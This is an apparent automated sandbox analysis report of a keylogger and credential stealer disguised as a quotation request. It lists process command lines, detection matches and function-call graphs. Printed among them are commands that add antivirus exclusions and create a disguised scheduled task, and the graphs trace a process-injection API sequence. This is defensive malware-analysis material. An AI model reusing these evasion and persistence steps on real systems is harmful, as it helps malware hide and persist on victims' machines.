                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
                                                                                                            Imagebase:0xbe0000
                                                                                                            File size:433'152 bytes
                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:4
                                                                                                            Start time:03:33:02
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:5
                                                                                                            Start time:03:33:02
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
                                                                                                            Imagebase:0xbe0000
                                                                                                            File size:433'152 bytes
                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:6
                                                                                                            Start time:03:33:02
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:7
                                                                                                            Start time:03:33:02
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp"
                                                                                                            Imagebase:0x580000
                                                                                                            File size:187'904 bytes
                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:8
                                                                                                            Start time:03:33:02
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:9
                                                                                                            Start time:03:33:02
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
                                                                                                            Imagebase:0xaa0000
                                                                                                            File size:787'968 bytes
                                                                                                            MD5 hash:7B5985233FAF11890E9CF4C7B579983B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:false

                                                                                                            Target ID:10
                                                                                                            Start time:03:33:04
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                            Imagebase:0x7ff6ef0c0000
                                                                                                            File size:496'640 bytes
                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:11
                                                                                                            Start time:03:33:05
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            Imagebase:0x1f0000
                                                                                                            File size:787'968 bytes
                                                                                                            MD5 hash:7B5985233FAF11890E9CF4C7B579983B
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Avira
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 34%, ReversingLabs
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:12
                                                                                                            Start time:03:33:07
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp"
                                                                                                            Imagebase:0x580000
                                                                                                            File size:187'904 bytes
                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:13
                                                                                                            Start time:03:33:07
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:14
                                                                                                            Start time:03:33:07
                                                                                                            Start date:20/11/2024
                                                                                                            Path:C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
                                                                                                            Imagebase:0xd30000
                                                                                                            File size:787'968 bytes
                                                                                                            MD5 hash:7B5985233FAF11890E9CF4C7B579983B
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.4514729893.0000000000435000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.4517414324.0000000003198000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Has exited:false

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:11.9%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:175
                                                                                                              Total number of Limit Nodes:14
                                                                                                              execution_graph 24462 6c5c0c0 24463 6c5c24b 24462->24463 24464 6c5c0e6 24462->24464 24464->24463 24466 6c563e0 24464->24466 24467 6c5c340 PostMessageW 24466->24467 24468 6c5c3ac 24467->24468 24468->24464 24469 ef4668 24470 ef4672 24469->24470 24472 ef4758 24469->24472 24473 ef477d 24472->24473 24477 ef4868 24473->24477 24481 ef4858 24473->24481 24478 ef488f 24477->24478 24479 ef496c 24478->24479 24485 ef44b0 24478->24485 24483 ef488f 24481->24483 24482 ef496c 24482->24482 24483->24482 24484 ef44b0 CreateActCtxA 24483->24484 24484->24482 24486 ef58f8 CreateActCtxA 24485->24486 24488 ef59bb 24486->24488 24488->24488 24499 efaef8 24500 efaf3a 24499->24500 24501 efaf40 GetModuleHandleW 24499->24501 24500->24501 24502 efaf6d 24501->24502 24503 6c5861f 24507 6c5aece 24503->24507 24528 6c5ae68 24503->24528 24504 6c58630 24508 6c5ae5c 24507->24508 24509 6c5aed1 24507->24509 24517 6c5ae8a 24508->24517 24548 6c5b741 24508->24548 24553 6c5b304 24508->24553 24558 6c5bb64 24508->24558 24563 6c5b499 24508->24563 24568 6c5bc79 24508->24568 24573 6c5b8de 24508->24573 24578 6c5b95c 24508->24578 24582 6c5b5f6 24508->24582 24586 6c5ad17 24508->24586 24591 6c5b657 24508->24591 24596 6c5bbeb 24508->24596 24601 6c5b5ab 24508->24601 24606 6c5b3cd 24508->24606 24611 6c5b262 24508->24611 24616 6c5b583 24508->24616 24620 6c5b723 24508->24620 24625 6c5b281 24508->24625 24509->24504 24517->24504 24529 6c5ae82 24528->24529 24530 6c5bb64 2 API calls 24529->24530 24531 6c5b304 2 API calls 24529->24531 24532 6c5b741 2 API calls 24529->24532 24533 6c5b281 2 API calls 24529->24533 24534 6c5b723 2 API calls 24529->24534 24535 6c5b583 2 API calls 24529->24535 24536 6c5b262 2 API calls 24529->24536 24537 6c5ae8a 24529->24537 24538 6c5b3cd 2 API calls 24529->24538 24539 6c5b5ab 2 API calls 24529->24539 24540 6c5bbeb 2 API calls 24529->24540 24541 6c5b657 2 API calls 24529->24541 24542 6c5ad17 2 API calls 24529->24542 24543 6c5b5f6 2 API calls 24529->24543 24544 6c5b95c 2 API calls 24529->24544 24545 6c5b8de 2 API calls 24529->24545 24546 6c5bc79 2 API calls 24529->24546 24547 6c5b499 2 API calls 24529->24547 24530->24537 24531->24537 24532->24537 24533->24537 24534->24537 24535->24537 24536->24537 24537->24504 24538->24537 24539->24537 24540->24537 24541->24537 24542->24537 24543->24537 24544->24537 24545->24537 24546->24537 24547->24537 24631 6c57dd0 24548->24631 24635 6c57dd8 24548->24635 24549 6c5ba3e 24549->24517 24550 6c5b3d9 24550->24548 24550->24549 24554 6c5b311 24553->24554 24639 6c57f64 24554->24639 24643 6c57f70 24554->24643 24559 6c5b3d9 24558->24559 24560 6c5ba3e 24559->24560 24561 6c57dd0 ReadProcessMemory 24559->24561 24562 6c57dd8 ReadProcessMemory 24559->24562 24560->24517 24561->24559 24562->24559 24564 6c5b3d9 24563->24564 24565 6c5ba3e 24564->24565 24566 6c57dd0 ReadProcessMemory 24564->24566 24567 6c57dd8 ReadProcessMemory 24564->24567 24565->24517 24566->24564 24567->24564 24569 6c5bca9 24568->24569 24647 6c57c20 24569->24647 24651 6c57c28 24569->24651 24570 6c5bcc7 24574 6c5b8e4 24573->24574 24655 6c57ce0 24574->24655 24659 6c57ce8 24574->24659 24575 6c5b916 24663 6c57b50 24578->24663 24667 6c57b48 24578->24667 24579 6c5b976 24584 6c57ce0 WriteProcessMemory 24582->24584 24585 6c57ce8 WriteProcessMemory 24582->24585 24583 6c5b61a 24583->24517 24584->24583 24585->24583 24587 6c5b3d9 24586->24587 24588 6c5ba3e 24587->24588 24589 6c57dd0 ReadProcessMemory 24587->24589 24590 6c57dd8 ReadProcessMemory 24587->24590 24588->24517 24589->24587 24590->24587 24592 6c5b65d 24591->24592 24594 6c57ce0 WriteProcessMemory 24592->24594 24595 6c57ce8 WriteProcessMemory 24592->24595 24593 6c5b916 24594->24593 24595->24593 24597 6c5ba87 24596->24597 24597->24596 24598 6c5bc2b 24597->24598 24671 6c5bef9 24597->24671 24676 6c5bf08 24597->24676 24598->24517 24602 6c5b5b1 24601->24602 24681 6c57aa0 24602->24681 24685 6c57a98 24602->24685 24603 6c5b5d7 24603->24517 24607 6c5b3d9 24606->24607 24608 6c5ba3e 24607->24608 24609 6c57dd0 ReadProcessMemory 24607->24609 24610 6c57dd8 ReadProcessMemory 24607->24610 24608->24517 24609->24607 24610->24607 24612 6c5b270 24611->24612 24614 6c57f64 CreateProcessA 24612->24614 24615 6c57f70 CreateProcessA 24612->24615 24613 6c5b3ae 24614->24613 24615->24613 24617 6c5b593 24616->24617 24618 6c57ce0 WriteProcessMemory 24617->24618 24619 6c57ce8 WriteProcessMemory 24617->24619 24618->24617 24619->24617 24621 6c5b5c2 24620->24621 24622 6c5b5d7 24621->24622 24623 6c57aa0 ResumeThread 24621->24623 24624 6c57a98 ResumeThread 24621->24624 24622->24517 24623->24622 24624->24622 24626 6c5b28e 24625->24626 24627 6c5b262 24625->24627 24626->24517 24629 6c57f64 CreateProcessA 24627->24629 24630 6c57f70 CreateProcessA 24627->24630 24628 6c5b3ae 24629->24628 24630->24628 24632 6c57e23 ReadProcessMemory 24631->24632 24634 6c57e67 24632->24634 24634->24550 24636 6c57e23 ReadProcessMemory 24635->24636 24638 6c57e67 24636->24638 24638->24550 24640 6c57ff9 CreateProcessA 24639->24640 24642 6c581bb 24640->24642 24644 6c57ff9 CreateProcessA 24643->24644 24646 6c581bb 24644->24646 24648 6c57c28 VirtualAllocEx 24647->24648 24650 6c57ca5 24648->24650 24650->24570 24652 6c57c68 VirtualAllocEx 24651->24652 24654 6c57ca5 24652->24654 24654->24570 24656 6c57d30 WriteProcessMemory 24655->24656 24658 6c57d87 24656->24658 24658->24575 24660 6c57d30 WriteProcessMemory 24659->24660 24662 6c57d87 24660->24662 24662->24575 24664 6c57b95 Wow64SetThreadContext 24663->24664 24666 6c57bdd 24664->24666 24666->24579 24668 6c57b50 Wow64SetThreadContext 24667->24668 24670 6c57bdd 24668->24670 24670->24579 24672 6c5bef8 24671->24672 24672->24671 24674 6c57b50 Wow64SetThreadContext 24672->24674 24675 6c57b48 Wow64SetThreadContext 24672->24675 24673 6c5bf33 24673->24597 24674->24673 24675->24673 24677 6c5bf1d 24676->24677 24679 6c57b50 Wow64SetThreadContext 24677->24679 24680 6c57b48 Wow64SetThreadContext 24677->24680 24678 6c5bf33 24678->24597 24679->24678 24680->24678 24682 6c57ae0 ResumeThread 24681->24682 24684 6c57b11 24682->24684 24684->24603 24686 6c57aa0 ResumeThread 24685->24686 24688 6c57b11 24686->24688 24688->24603 24489 efcfa0 24490 efcfe6 GetCurrentProcess 24489->24490 24492 efd038 GetCurrentThread 24490->24492 24493 efd031 24490->24493 24494 efd06e 24492->24494 24495 efd075 GetCurrentProcess 24492->24495 24493->24492 24494->24495 24498 efd0ab 24495->24498 24496 efd0d3 GetCurrentThreadId 24497 efd104 24496->24497 24498->24496 24689 efd5f0 DuplicateHandle 24690 efd686 24689->24690
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 680e8e197c9bf02f4aa750719e58fca0698d9e9c58115384a043e89fced3cae5
                                                                                                              • Instruction ID: 41488ca4cd720f25f4bc7eaff9e31a4a418c4aac3dd64dd4841f8f7c1a2af21d
                                                                                                              • Opcode Fuzzy Hash: 680e8e197c9bf02f4aa750719e58fca0698d9e9c58115384a043e89fced3cae5
                                                                                                              • Instruction Fuzzy Hash: F5E1EC70B013048FDB65EB75C850BAEBBF6AF89300F15446DE94AEB291CB34E981CB55
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dd3df81faaa1cfb6f2123996c161158b494ec8f0936030598e646df728be62f4
                                                                                                              • Instruction ID: 6da812a35797c0d28c22ba280be70436e1a8e8be46db10c390f45a8e37a117cc
                                                                                                              • Opcode Fuzzy Hash: dd3df81faaa1cfb6f2123996c161158b494ec8f0936030598e646df728be62f4
                                                                                                              • Instruction Fuzzy Hash: F3A00240CAF454C8A2C05D120C252F8D9BC060F451F8330004C1E332164450C8C0109D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 294 efcfa0-efd02f GetCurrentProcess 298 efd038-efd06c GetCurrentThread 294->298 299 efd031-efd037 294->299 300 efd06e-efd074 298->300 301 efd075-efd0a9 GetCurrentProcess 298->301 299->298 300->301 302 efd0ab-efd0b1 301->302 303 efd0b2-efd0cd call efd578 301->303 302->303 307 efd0d3-efd102 GetCurrentThreadId 303->307 308 efd10b-efd16d 307->308 309 efd104-efd10a 307->309 309->308
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00EFD01E
                                                                                                              • GetCurrentThread.KERNEL32 ref: 00EFD05B
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00EFD098
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00EFD0F1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2112662144.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_ef0000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Current$ProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2063062207-0
                                                                                                              • Opcode ID: 58994dbf798b62220bb59b6d2d6f7b5e8ab00bfb032c47122e527f9e609c13a0
                                                                                                              • Instruction ID: bf382e7f71c01ebb521dae01731548863dc657c5851e0b537eecee0c2a909712
                                                                                                              • Opcode Fuzzy Hash: 58994dbf798b62220bb59b6d2d6f7b5e8ab00bfb032c47122e527f9e609c13a0
                                                                                                              • Instruction Fuzzy Hash: CA5167B0904309CFDB14CFA9D948BAEBBF2FF88314F248459E519B7250DB746944CB65

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 516 6c57f64-6c58005 518 6c58007-6c58011 516->518 519 6c5803e-6c5805e 516->519 518->519 520 6c58013-6c58015 518->520 526 6c58097-6c580c6 519->526 527 6c58060-6c5806a 519->527 521 6c58017-6c58021 520->521 522 6c58038-6c5803b 520->522 524 6c58025-6c58034 521->524 525 6c58023 521->525 522->519 524->524 528 6c58036 524->528 525->524 535 6c580ff-6c581b9 CreateProcessA 526->535 536 6c580c8-6c580d2 526->536 527->526 529 6c5806c-6c5806e 527->529 528->522 531 6c58091-6c58094 529->531 532 6c58070-6c5807a 529->532 531->526 533 6c5807c 532->533 534 6c5807e-6c5808d 532->534 533->534 534->534 537 6c5808f 534->537 547 6c581c2-6c58248 535->547 548 6c581bb-6c581c1 535->548 536->535 538 6c580d4-6c580d6 536->538 537->531 540 6c580f9-6c580fc 538->540 541 6c580d8-6c580e2 538->541 540->535 542 6c580e4 541->542 543 6c580e6-6c580f5 541->543 542->543 543->543 545 6c580f7 543->545 545->540 558 6c58258-6c5825c 547->558 559 6c5824a-6c5824e 547->559 548->547 561 6c5826c-6c58270 558->561 562 6c5825e-6c58262 558->562 559->558 560 6c58250 559->560 560->558 564 6c58280-6c58284 561->564 565 6c58272-6c58276 561->565 562->561 563 6c58264 562->563 563->561 567 6c58296-6c5829d 564->567 568 6c58286-6c5828c 564->568 565->564 566 6c58278 565->566 566->564 569 6c582b4 567->569 570 6c5829f-6c582ae 567->570 568->567 572 6c582b5 569->572 570->569 572->572
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C581A6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: fabed10d909514cf5e8958c49115c5328b08b338d1fd35cfaafbf3922456a356
                                                                                                              • Instruction ID: e8a200f522002bd73a5a3eabd01bbd3d378c3c2f2e439ec5ca45fb8deb57b5d7
                                                                                                              • Opcode Fuzzy Hash: fabed10d909514cf5e8958c49115c5328b08b338d1fd35cfaafbf3922456a356
                                                                                                              • Instruction Fuzzy Hash: 82A18C71D01669CFDF64CFA8CC417AEBBB2BF48300F1581AAD808A7240DB759A85CF95

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 573 6c57f70-6c58005 575 6c58007-6c58011 573->575 576 6c5803e-6c5805e 573->576 575->576 577 6c58013-6c58015 575->577 583 6c58097-6c580c6 576->583 584 6c58060-6c5806a 576->584 578 6c58017-6c58021 577->578 579 6c58038-6c5803b 577->579 581 6c58025-6c58034 578->581 582 6c58023 578->582 579->576 581->581 585 6c58036 581->585 582->581 592 6c580ff-6c581b9 CreateProcessA 583->592 593 6c580c8-6c580d2 583->593 584->583 586 6c5806c-6c5806e 584->586 585->579 588 6c58091-6c58094 586->588 589 6c58070-6c5807a 586->589 588->583 590 6c5807c 589->590 591 6c5807e-6c5808d 589->591 590->591 591->591 594 6c5808f 591->594 604 6c581c2-6c58248 592->604 605 6c581bb-6c581c1 592->605 593->592 595 6c580d4-6c580d6 593->595 594->588 597 6c580f9-6c580fc 595->597 598 6c580d8-6c580e2 595->598 597->592 599 6c580e4 598->599 600 6c580e6-6c580f5 598->600 599->600 600->600 602 6c580f7 600->602 602->597 615 6c58258-6c5825c 604->615 616 6c5824a-6c5824e 604->616 605->604 618 6c5826c-6c58270 615->618 619 6c5825e-6c58262 615->619 616->615 617 6c58250 616->617 617->615 621 6c58280-6c58284 618->621 622 6c58272-6c58276 618->622 619->618 620 6c58264 619->620 620->618 624 6c58296-6c5829d 621->624 625 6c58286-6c5828c 621->625 622->621 623 6c58278 622->623 623->621 626 6c582b4 624->626 627 6c5829f-6c582ae 624->627 625->624 629 6c582b5 626->629 627->626 629->629
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C581A6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: 22229a2cc9c58267da18da2254d773d255e978f1939b02263e7b7237528fc035
                                                                                                              • Instruction ID: 2d76e16178c5c6cdd66c83ec9b928c3de5eeb4cdded5c388f6e08e9172045fad
                                                                                                              • Opcode Fuzzy Hash: 22229a2cc9c58267da18da2254d773d255e978f1939b02263e7b7237528fc035
                                                                                                              • Instruction Fuzzy Hash: E1918C71D01669CFDF64CFA8CC417AEBBB2BF48310F1581AAD808A7240DB759A85CF95

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 630 ef44b0-ef59b9 CreateActCtxA 633 ef59bb-ef59c1 630->633 634 ef59c2-ef5a1c 630->634 633->634 641 ef5a1e-ef5a21 634->641 642 ef5a2b-ef5a2f 634->642 641->642 643 ef5a31-ef5a3d 642->643 644 ef5a40 642->644 643->644 646 ef5a41 644->646 646->646
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 00EF59A9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2112662144.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_ef0000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: 07dd165b0324a0b6bd49d994245c35c5d12a57ae5b8790c8fb123a9931afc1be
                                                                                                              • Instruction ID: 7982622fd7fca509b1b2ab4f3b7067940b98fb9b44bd522abcb275173378128b
                                                                                                              • Opcode Fuzzy Hash: 07dd165b0324a0b6bd49d994245c35c5d12a57ae5b8790c8fb123a9931afc1be
                                                                                                              • Instruction Fuzzy Hash: D341E2B1C0071DCADB24CFA9C884B9EBBB5BF89304F20816AD508BB251DB756945CF90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 647 ef58ec-ef58ef 648 ef58fc-ef59b9 CreateActCtxA 647->648 650 ef59bb-ef59c1 648->650 651 ef59c2-ef5a1c 648->651 650->651 658 ef5a1e-ef5a21 651->658 659 ef5a2b-ef5a2f 651->659 658->659 660 ef5a31-ef5a3d 659->660 661 ef5a40 659->661 660->661 663 ef5a41 661->663 663->663
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 00EF59A9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2112662144.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_ef0000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: 6f126329ec2d538629c4a89454fecb59b407f2c087c69e591e18fc393105aa35
                                                                                                              • Instruction ID: 1586962d0687eaa662d83826f31b7b01b73251e750c29ce3b3d1e276524b766e
                                                                                                              • Opcode Fuzzy Hash: 6f126329ec2d538629c4a89454fecb59b407f2c087c69e591e18fc393105aa35
                                                                                                              • Instruction Fuzzy Hash: 134100B1C0071DCADB25CFA9C884B9DBBB6BF89304F20816AD518BB251DB756946CF90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 664 6c57ce0-6c57d36 666 6c57d46-6c57d85 WriteProcessMemory 664->666 667 6c57d38-6c57d44 664->667 669 6c57d87-6c57d8d 666->669 670 6c57d8e-6c57dbe 666->670 667->666 669->670
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06C57D78
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2118346261.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6c50000_Request for Quotation MK FMHS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: 77558a86bc8553ae68517e5b277e7eedefc4400062b24c19c9b1d2921d53c75c
                                                                                                              • Instruction ID: 3bd76875f3f3efc1174375bd0fe17242f5ed2187677326d8a7df7202e1c44a5d
                                                                                                              • Opcode Fuzzy Hash: 77558a86bc8553ae68517e5b277e7eedefc4400062b24c19c9b1d2921d53c75c
                                                                                                              • Instruction Fuzzy Hash: 232137B59002499FDB10CFA9C881BEEBBF5FF48320F10842AE919A7250D7789941DBA4

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
